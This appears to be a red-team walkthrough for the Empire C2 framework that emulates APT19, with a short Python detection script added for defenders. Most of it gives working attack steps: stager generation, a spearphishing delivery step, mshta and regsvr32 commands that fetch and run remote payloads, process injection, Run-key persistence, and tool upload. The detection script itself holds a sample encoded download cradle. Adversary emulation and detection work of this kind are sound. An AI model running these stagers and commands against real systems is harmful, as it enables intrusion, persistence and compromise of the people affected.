Empire3
Empire is fully supported by BC-Security
Install on Kali:
sudo apt install powershell-empire
Install on Ubuntu:
cd /opt
sudo git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, setup/install.sh exits early because it checks for Ubuntu 20.04 while Slingshot is built on 18.04. Replace the version line in setup/install.sh with the correct version:
And comment out the version test:
#if [ $VERSION_ID != "20.04" ]; then
#    echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit
#fi
Download Starkiller if you want a GUI:
cd /opt
sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage
sudo chmod +x starkiller-1.0.0.AppImage
Run Empire (Ubuntu install):
sudo empire
On Kali:
sudo powershell-empire
Run Empire with the REST API enabled so Starkiller can connect, if you want a GUI:
sudo empire --rest --username <user> --password <password>
Open Starkiller (run it from the directory where you saved the AppImage; the download step above put it in /opt, and the filename must match the version you downloaded):
cd /opt/starkiller
./starkiller-1.2.2.AppImage
Login to Starkiller:
- URL: https://localhost:1337 (Empire's REST API; it is served over HTTPS with a self-signed certificate by default)
- Username: <user>
- Password: <password>
This walkthrough uses the SCYTHE adversary emulation plan for APT19 as the example: https://www.scythe.io/library/threatthursday-apt19
| Tactic | Description |
| --- | --- |
| Description | APT19 is a China-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. |
| Goal and Intent | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. |
| Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server |
| Initial Access | Spearphishing Attachment (T1193); Spearphishing Link (T1192) |
| Execution | PowerShell (T1086); User Execution; Hidden Window (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073) |
| Discovery | System Owner/User Discovery (T1033); System Information Discovery (T1082); System Network Configuration Discovery (T1016) |
| Persistence | Registry Run Keys / Startup Folder (T1060) - establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\ |
| Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques |
The technique IDs are the ones used by the SCYTHE plan, i.e. the pre-sub-technique ATT&CK numbering (for example T1086 PowerShell is now T1059.001).
Create Listener
Type: http
Name: http
Host: http://10.0.0.187
Port: 80
BindIP: 10.0.0.187
Jitter: 0.5
StagingKey: georgy
Generate Stager HTA:
Type: windows/hta
Listener: http
Base64: True
Language: powershell
Outfile: /tmp/Resume.hta
Generate Stager SCT:
Type: windows/launcher_sct
Listener: http
Base64: True
Language: powershell
OutFile: /tmp/launcher.sct (the module default; the regsvr32 step below fetches this file)
Generate Stager DLL:
Type: windows/dll
Listener: http
Arch: x86
Language: powershell
OutFile: /tmp/launcher.dll
Optional Fields
Obfuscate: True
ObfuscateCommand: Token\String\1
Download the stagers to /tmp and serve them with Python's built-in web server (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is the http.server module):
cd /tmp
python -m SimpleHTTPServer 8080
Deliver the link to Resume.hta by spearphishing email (T1192).
What the victim's click executes on the target (run it directly to demonstrate):
mshta http://10.0.0.187:8080/Resume.hta
Migrate to another process with reflective PE injection (see https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/). List the running processes first to pick a target PID:
ps
usemodule code_execution/invoke_reflectivepeinjection
set ProcID <processID>
set DllPath /tmp/launcher.dll
The DLL above was generated with Arch: x86, so the target process must be 32-bit; on 64-bit Windows most processes are x64, so either pick a 32-bit (WOW64) process from the ps output or regenerate the DLL with Arch: x64 to match.
Discovery from the agent menu (the plan's T1033, T1082 and T1016):
whoami
usemodule situational_awareness/host/antivirusproduct
usemodule situational_awareness/host/get_uaclevel
usemodule situational_awareness/host/winenum
Persistence via a Run key (T1060):
usemodule persistence/userland/registry
set Listener http
Verify in regedit under HKCU\Software\Microsoft\Windows\CurrentVersion: by default the module stores the encoded launcher in a value directly under that key and adds a Run value that reads it back and starts PowerShell with a hidden window.
Execution via regsvr32 and scripting (T1117, T1064). Create a shortcut named Chrome with its Target set to the following (note the URL must use forward slashes; regsvr32 fetches the SCT over HTTP and scrobj.dll runs the scriptlet):
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http://10.0.0.187:8080/launcher.sct scrobj.dll"
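The detection side of the chain above, as an added example that is not code from this page, from Empire/BC-Security or from the APT19 plan: a small Python triage that flags the three launch patterns used in this walkthrough (mshta fetching a remote HTA, regsvr32 /i:http with scrobj.dll, and a hidden-window PowerShell launcher with an -enc payload, which it decodes from Base64/UTF-16LE) plus the shape of the Run value left by the userland registry persistence step. The sample command lines are constructed for the demo, the label names are my own, and the Run-value sample only approximates what the persistence module writes rather than quoting it.

```python
"""Triage of the execution chain emulated in this walkthrough.

Added example for this page; not code from Empire, BC-Security or the APT19
plan. It classifies process command lines (the CommandLine field of a Sysmon
Event ID 1 or Security 4688 record, or the data of a Run value) against the
launch patterns used above: mshta fetching a remote HTA, regsvr32 pulling a
remote SCT through scrobj.dll, and a hidden-window PowerShell launcher whose
-EncodedCommand payload (Base64 of UTF-16LE) is decoded for inspection.
Every line in SAMPLES is constructed for the demo; the IP and paths mirror
the walkthrough, and the Run-value sample only approximates the shape of what
persistence/userland/registry writes, not its exact text.
"""
import base64
import binascii
import re
from typing import Optional


def _prefixes(word: str) -> str:
    """Alternation of every leading prefix of word: powershell.exe accepts any
    unambiguous prefix of a parameter name (-w, -win, -WindowStyle, ...)."""
    return "|".join(re.escape(word[:n]) for n in range(1, len(word) + 1))


# -e / -ec / -enc / ... / -EncodedCommand followed by a Base64 blob.
ENC_RE = re.compile(r"-(?:ec|" + _prefixes("encodedcommand") + r")\s+([A-Za-z0-9+/=]{16,})", re.I)
# -w 1 / -W Hidden / -WindowStyle Hidden (1 is the numeric value of Hidden).
HIDDEN_RE = re.compile(r"-(?:" + _prefixes("windowstyle") + r")\s+(?:hidden|1)\b", re.I)
CRADLE_WORDS = ("downloadstring", "net.webclient", "invoke-expression", "iex ")


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way a launcher does."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Reverse of encode_ps; None when the blob is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Return {'hits': [labels], 'decoded': script or None} for one command line."""
    low = cmdline.lower()
    hits, decoded = [], None
    if re.search(r"\bmshta(?:\.exe)?\b.*\bhttps?://", low):
        hits.append("mshta-remote-hta")
    if (re.search(r"\bregsvr32(?:\.exe)?\b", low) and "scrobj.dll" in low
            and re.search(r"/i:\s*https?://", low)):
        hits.append("regsvr32-remote-sct")
    if re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", low):
        m = ENC_RE.search(cmdline)
        if m:
            hits.append("powershell-encoded")
            decoded = decode_ps(m.group(1))
        if HIDDEN_RE.search(cmdline):
            hits.append("powershell-hidden-window")
        # Launcher that reads its payload back out of the registry (Run-key style).
        if re.search(r"\b(?:gp|get-itemproperty)\s+hk(?:cu|lm)", low):
            hits.append("powershell-reads-registry-payload")
    # Look for a download cradle in the decoded script, else in the raw line.
    body = (decoded or cmdline).lower()
    if any(word in body for word in CRADLE_WORDS):
        hits.append("download-cradle")
    return {"hits": hits, "decoded": decoded}


# Constructed sample command lines (not real telemetry).
SAMPLES = [
    # The victim runs the phishing link (HTA stager).
    r"mshta http://10.0.0.187:8080/Resume.hta",
    # The 'Chrome' shortcut target: regsvr32 squiblydoo fetching the SCT stager.
    r'C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http://10.0.0.187:8080/launcher.sct scrobj.dll"',
    # Hidden-window encoded launcher; the inner script is a placeholder cradle.
    "powershell -noP -sta -w 1 -enc " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.187/login/process.php')"),
    # Approximate shape of a Run value written by userland registry persistence.
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);start -Win Hidden -A \"-enc $x\" powershell";exit',
    # Benign line for contrast.
    r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt",
]


def triage_all(lines=SAMPLES):
    """Triage every line; returns [(cmdline, hits, decoded), ...]."""
    out = []
    for line in lines:
        r = triage(line)
        out.append((line, r["hits"], r["decoded"]))
    return out


if __name__ == "__main__":
    for line, hits, decoded in triage_all():
        print(hits or ["clean"], line[:70])
        if decoded:
            print("   decoded:", decoded)
```

Point triage_all at the CommandLine field of your process-creation events (or at the data of each value under the Run key) to see which steps of the emulation your telemetry actually surfaces; the decoded script is what to hand to the analyst, since the raw -enc blob tells them nothing.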
Upload a tool into the user's profile through the agent and run it (upload writes to the agent's current directory, hence the cd first):
cd C:\Users\<username>
upload /tmp/file
shell C:\Users\<username>\<executable>